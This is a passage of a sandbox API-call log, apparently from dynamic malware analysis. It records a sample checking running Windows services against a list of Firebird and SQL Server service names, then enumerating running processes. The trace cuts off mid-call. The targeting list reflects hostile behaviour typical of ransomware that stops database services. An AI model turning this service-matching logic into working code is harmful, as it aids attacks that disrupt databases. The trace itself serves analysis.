(lpString1="FirebirdServerDefaultInstance", lpString2="PcaSvc") returned -1 [0043.361] lstrcmpiW (lpString1="sqlwriter", lpString2="PcaSvc") returned 1 [0043.361] lstrcmpiW (lpString1="mssqlserver", lpString2="PcaSvc") returned -1 [0043.361] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="PcaSvc") returned 1 [0043.361] lstrlenW (lpString="PlugPlay") returned 8 [0043.361] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="PlugPlay") returned -1 [0043.361] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="PlugPlay") returned -1 [0043.361] lstrcmpiW (lpString1="sqlwriter", lpString2="PlugPlay") returned 1 [0043.361] lstrcmpiW (lpString1="mssqlserver", lpString2="PlugPlay") returned -1 [0043.361] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="PlugPlay") returned 1 [0043.361] lstrlenW (lpString="Power") returned 5 [0043.361] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Power") returned -1 [0043.361] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Power") returned -1 [0043.361] lstrcmpiW (lpString1="sqlwriter", lpString2="Power") returned 1 [0043.361] lstrcmpiW (lpString1="mssqlserver", lpString2="Power") returned -1 [0043.361] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Power") returned 1 [0043.361] lstrlenW (lpString="ProfSvc") returned 7 [0043.361] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="ProfSvc") returned -1 [0043.361] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="ProfSvc") returned -1 [0043.361] lstrcmpiW (lpString1="sqlwriter", lpString2="ProfSvc") returned 1 [0043.361] lstrcmpiW (lpString1="mssqlserver", lpString2="ProfSvc") returned -1 [0043.361] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="ProfSvc") returned 1 [0043.361] lstrlenW (lpString="RpcEptMapper") returned 12 [0043.361] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="RpcEptMapper") returned -1 [0043.361] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="RpcEptMapper") returned -1 [0043.361] lstrcmpiW (lpString1="sqlwriter", lpString2="RpcEptMapper") returned 1 [0043.361] lstrcmpiW (lpString1="mssqlserver", lpString2="RpcEptMapper") returned -1 [0043.361] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="RpcEptMapper") returned 1 [0043.361] lstrlenW (lpString="RpcSs") returned 5 [0043.361] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="RpcSs") returned -1 [0043.361] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="RpcSs") returned -1 [0043.361] lstrcmpiW (lpString1="sqlwriter", lpString2="RpcSs") returned 1 [0043.361] lstrcmpiW (lpString1="mssqlserver", lpString2="RpcSs") returned -1 [0043.362] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="RpcSs") returned 1 [0043.362] lstrlenW (lpString="SamSs") returned 5 [0043.362] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SamSs") returned -1 [0043.362] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SamSs") returned -1 [0043.362] lstrcmpiW (lpString1="sqlwriter", lpString2="SamSs") returned 1 [0043.362] lstrcmpiW (lpString1="mssqlserver", lpString2="SamSs") returned -1 [0043.362] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SamSs") returned 1 [0043.362] lstrlenW (lpString="Schedule") returned 8 [0043.362] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Schedule") returned -1 [0043.362] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Schedule") returned -1 [0043.362] lstrcmpiW (lpString1="sqlwriter", lpString2="Schedule") returned 1 [0043.362] lstrcmpiW (lpString1="mssqlserver", lpString2="Schedule") returned -1 [0043.362] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Schedule") returned 1 [0043.362] lstrlenW (lpString="SecurityHealthService") returned 21 [0043.362] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SecurityHealthService") returned -1 [0043.362] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SecurityHealthService") returned -1 [0043.362] lstrcmpiW (lpString1="sqlwriter", lpString2="SecurityHealthService") returned 1 [0043.362] lstrcmpiW (lpString1="mssqlserver", lpString2="SecurityHealthService") returned -1 [0043.362] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SecurityHealthService") returned 1 [0043.362] lstrlenW (lpString="SENS") returned 4 [0043.362] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SENS") returned -1 [0043.362] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SENS") returned -1 [0043.362] lstrcmpiW (lpString1="sqlwriter", lpString2="SENS") returned 1 [0043.362] lstrcmpiW (lpString1="mssqlserver", lpString2="SENS") returned -1 [0043.362] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SENS") returned 1 [0043.362] lstrlenW (lpString="ShellHWDetection") returned 16 [0043.362] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="ShellHWDetection") returned -1 [0043.362] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="ShellHWDetection") returned -1 [0043.362] lstrcmpiW (lpString1="sqlwriter", lpString2="ShellHWDetection") returned 1 [0043.362] lstrcmpiW (lpString1="mssqlserver", lpString2="ShellHWDetection") returned -1 [0043.362] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="ShellHWDetection") returned 1 [0043.362] lstrlenW (lpString="Spooler") returned 7 [0043.362] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Spooler") returned -1 [0043.363] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Spooler") returned -1 [0043.363] lstrcmpiW (lpString1="sqlwriter", lpString2="Spooler") returned 1 [0043.363] lstrcmpiW (lpString1="mssqlserver", lpString2="Spooler") returned -1 [0043.363] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Spooler") returned 1 [0043.363] lstrlenW (lpString="StateRepository") returned 15 [0043.363] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="StateRepository") returned -1 [0043.363] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="StateRepository") returned -1 [0043.363] lstrcmpiW (lpString1="sqlwriter", lpString2="StateRepository") returned -1 [0043.363] lstrcmpiW (lpString1="mssqlserver", lpString2="StateRepository") returned -1 [0043.363] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="StateRepository") returned -1 [0043.363] lstrlenW (lpString="SysMain") returned 7 [0043.363] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SysMain") returned -1 [0043.363] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SysMain") returned -1 [0043.363] lstrcmpiW (lpString1="sqlwriter", lpString2="SysMain") returned -1 [0043.363] lstrcmpiW (lpString1="mssqlserver", lpString2="SysMain") returned -1 [0043.363] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SysMain") returned -1 [0043.363] lstrlenW (lpString="SystemEventsBroker") returned 18 [0043.363] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SystemEventsBroker") returned -1 [0043.363] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SystemEventsBroker") returned -1 [0043.363] lstrcmpiW (lpString1="sqlwriter", lpString2="SystemEventsBroker") returned -1 [0043.363] lstrcmpiW (lpString1="mssqlserver", lpString2="SystemEventsBroker") returned -1 [0043.363] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SystemEventsBroker") returned -1 [0043.363] lstrlenW (lpString="Themes") returned 6 [0043.363] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Themes") returned -1 [0043.363] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Themes") returned -1 [0043.363] lstrcmpiW (lpString1="sqlwriter", lpString2="Themes") returned -1 [0043.363] lstrcmpiW (lpString1="mssqlserver", lpString2="Themes") returned -1 [0043.364] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x62d420 | out: hHeap=0x5d0000) returned 1 [0043.364] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x27c [0043.369] Process32FirstW (in: hSnapshot=0x27c, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0043.369] Process32NextW (in: hSnapshot=0x27c, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6b, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0043.370] lstrlenW (lpString="System") returned 6 [0043.370] Process32NextW (in: hSnapshot=0x27c, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x144, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0043.370] lstrlenW (lpString="smss.exe") returned 8 [0043.371] Process32NextW (in: hSnapshot=0x27c, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x19c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x194, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0043.371] lstrlenW (lpString="csrss.exe") returned 9 [0043.371] Process32NextW (in: hSnapshot=0x27c, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x194, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0043.372] lstrlenW (lpString="wininit.exe") returned 11 [0043.372] Process32NextW (in: hSnapshot=0x27c, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1e4, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0043.389] lstrlenW (lpString="csrss.exe") returned 9 [0043.389] Process32NextW (in: hSnapshot=0x27c, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x234, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1e4, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0043.390] lstrlenW (lpString="winlogon.exe") returned 12 [0043.390] Process32NextW (in: hSnapshot=0x27c, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x250, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1ec, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0043.391] lstrlenW (lpString="services.exe") returned 12 [0043.391] Process32NextW (in: hSnapshot=0x27c, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x258, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1ec, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0043.391] lstrlenW (lpString="lsass.exe") returned 9 [0043.392] Process32NextW (in: hSnapshot=0x27c, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x15, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0043.392] lstrlenW (lpString="svchost.exe") returned 11 [0043.392] Process32NextW (in: hSnapshot=0x27c, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x234, pcPriClassBase=8, dwFlags=0x0, szExeFile="fontdrvhost.exe")) returned 1 [0043.393] lstrlenW (lpString="fontdrvhost.exe") returned 15 [0043.393] Process32NextW (in: hSnapshot=0x27c, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1ec, pcPriClassBase=8, dwFlags=0x0, szExeFile="fontdrvhost.exe")) returned 1 [0043.394] lstrlenW (lpString="fontdrvhost.exe") returned 15 [0043.394] Process32NextW (in: hSnapshot=0x27c, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x318, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0043.395] lstrlenW (lpString="svchost.exe") returned 11 [0043.395] Process32NextW (in: hSnapshot=0x27c, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x374, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x234, pcPriClassBase=13, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0043.396] lstrlenW (lpString="dwm.exe") returned 7 [0043.396] Process32NextW (in: hSnapshot=0x27c, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x50, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0043.396] lstrlenW (lpString="svchost.exe") returned 11 [0043.396] Process32NextW (in: hSnapshot=0x27c, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3d0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0043.397] lstrlenW (lpString="svchost.exe") returned 11 [0043.397] Process32NextW (in: hSnapshot=0x27c, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x15, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0043.398] lstrlenW (lpString="svchost.exe") returned 11 [0043.398] Process32NextW (in: hSnapshot=0x27c, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x12c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0043.399] lstrlenW (lpString="svchost.exe") returned 11 [0043.399] Process32NextW (in: hSnapshot=0x27c, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x170, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x26, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0043.399] lstrlenW (lpString="svchost.exe") returned 11 [0043.399] Process32NextW (in: hSnapshot=0x27c, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1b, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0043.400] lstrlenW (lpString="svchost.exe") returned 11 [0043.400] Process32NextW (in: hSnapshot=0x27c, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0043.401] lstrlenW (lpString="svchost.exe") returned 11 [0043.401] Process32NextW (in: hSnapshot=0x27c, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x530, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0043.402] lstrlenW (lpString="svchost.exe") returned 11 [0043.402] Process32NextW (in: hSnapshot=0x27c, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x538, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0043.403] lstrlenW (lpString="svchost.exe") returned 11 [0043.403] Process32NextW (in: hSnapshot=0x27c, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0043.404] lstrlenW (lpString="spoolsv.exe") returned 11 [0043.404] Process32NextW (in: hSnapshot=0x27c, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0043.405] lstrlenW (lpString="svchost.exe") returned 11 [0043.405] Process32NextW (in: hSnapshot=0x27c, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x684, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0043.405] lstrlenW (lpString="svchost.exe") returned 11 [0043.405] Process32NextW (in: hSnapshot=0x27c, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x4fc, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0043.406] lstrlenW (lpString="audiodg.exe") returned 11 [0043.406] Process32NextW (in: hSnapshot=0x27c, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x3c0, pcPriClassBase=8, dwFlags=0x0, szExeFile="sihost.exe")) returned 1 [0043.407] lstrlenW (lpString="sihost.exe") returned 10 [0043.407] Process32NextW (in: hSnapshot=0x27c, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x718, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0043.408] lstrlenW (lpString="svchost.exe") returned 11 [0043.408] Process32NextW (in: hSnapshot=0x27c, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x3c0, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 1 [0043.409] lstrlenW (lpString="taskhostw.exe") returned 13 [0043.409] Process32NextW (in: hSnapshot=0x27c, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="OfficeClickToRun.exe")) returned 1 [0043.410] lstrlenW (lpString="OfficeClickToRun.exe") returned 20 [0043.410] Process32NextW (in: hSnapshot=0x27c, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x55c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="SecurityHealthService.exe")) returned 1 [0043.410] lstrlenW (lpString="SecurityHealthService.exe") returned 25 [0043.410] Process32NextW (in: hSnapshot=0x27c, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x860, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3d, th32ParentProcessID=0x834, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0043.411] lstrlenW (lpString="explorer.exe") returned 12 [0043.411] Process32NextW (in: hSnapshot=0x27c, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x8bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x4, pcPriClassBase=8, dwFlags=0x0, szExeFile="Memory Compression")) returned 1 [0043.412] lstrlenW (lpString="Memory Compression") returned 18 [0043.412] Process32NextW (in: hSnapshot=0x27c, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb50, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1b, th32ParentProcessID=0x2b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="ShellExperienceHost.exe")) returned 1 [0043.413] lstrlenW (lpString="ShellExperienceHost.exe") returned 23 [0043.413] Process32NextW (in: hSnapshot=0x27c, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb58, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1c, th32ParentProcessID=0x2b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="SearchUI.exe")) returned 1 [0043.413] lstrlenW (lpString="SearchUI.exe") returned 12 [0043.413] Process32NextW (in: hSnapshot=0x27c, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xbf4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x2b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="RuntimeBroker.exe")) returned 1 [0043.414] lstrlenW (lpString="RuntimeBroker.exe") returned 17 [0043.414] Process32NextW (in: hSnapshot=0x27c, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xe04, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x2b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0043.415] lstrlenW (lpString="WmiPrvSE.exe") returned 12 [0043.415] Process32NextW (in: hSnapshot=0x27c, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xf24, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x3c0, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 1 [0043.416] lstrlenW (lpString="taskhostw.exe") returned 13 [0043.416] Process32NextW (in: hSnapshot=0x27c, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xfa8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x3c0, pcPriClassBase=6, dwFlags=0x0, szExeFile="OfficeC2RClient.exe")) returned 1 [0043.417] lstrlenW (lpString="OfficeC2RClient.exe") returned 19 [0043.417] Process32NextW (in: hSnapshot=0x27c, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xfb0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x3c0, pcPriClassBase=6, dwFlags=0x0, szExeFile="UsoClient.exe")) returned 1 [0043.417] lstrlenW (lpString="UsoClient.exe") returned 13 [0043.418] Process32NextW (in: hSnapshot=0x27c, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xfb8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x3c0, pcPriClassBase=6, dwFlags=0x0, szExeFile="OfficeC2RClient.exe")) returned 1 [0043.418] lstrlenW (lpString="OfficeC2RClient.exe") returned 19 [0043.418] Process32NextW (in: hSnapshot=0x27c, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xfc0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x3c0, pcPriClassBase=6, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 1 [0043.419] lstrlenW (lpString="taskhostw.exe") returned 13 [0043.419] Process32NextW (in: hSnapshot=0x27c, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xfc8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x3c0, pcPriClassBase=6, dwFlags=0x0, szExeFile="DeviceCensus.exe")) returned 1 [0043.420] lstrlenW (lpString="DeviceCensus.exe") returned 16 [0043.420] Process32NextW (in: hSnapshot=0x27c, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xfd0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x3c0, pcPriClassBase=6, dwFlags=0x0, szExeFile="UNPCampaignManager.exe")) returned 1 [0043.421] lstrlenW (lpString="UNPCampaignManager.exe") returned 22 [0043.421] Process32NextW (in: hSnapshot=0x27c, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xfdc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x3c0, pcPriClassBase=6, dwFlags=0x0, szExeFile="msoia.exe")) returned 1 [0043.446] lstrlenW (lpString="msoia.exe") returned 9 [0043.446] Process32NextW (in: hSnapshot=0x27c, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xfe8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x3c0, pcPriClassBase=6, dwFlags=0x0, szExeFile="msoia.exe")) returned 1 [0043.449] lstrlenW (lpString="msoia.exe") returned 9 [0043.449] Process32NextW (in: hSnapshot=0x27c, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xff4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x3c0, pcPriClassBase=6, dwFlags=0x0, szExeFile="AppHostRegistrationVerifier.exe")) returned 1 [0043.450] lstrlenW (lpString="AppHostRegistrationVerifier.exe") returned 31 [0043.450] Process32NextW (in: hSnapshot=0x27c, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4b8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="screensaver.exe")) returned 1 [0043.451] lstrlenW (lpString="screensaver.exe") returned 15 [0043.451] Process32NextW (in: hSnapshot=0x27c, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="xml upper.exe")) returned 1 [0043.452] lstrlenW (lpString="xml upper.exe") returned 13 [0043.452] Process32NextW (in: hSnapshot=0x27c, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="defeat preston.exe")) returned 1 [0043.453] lstrlenW (lpString="defeat preston.exe") returned 18 [0043.453] Process32NextW (in: 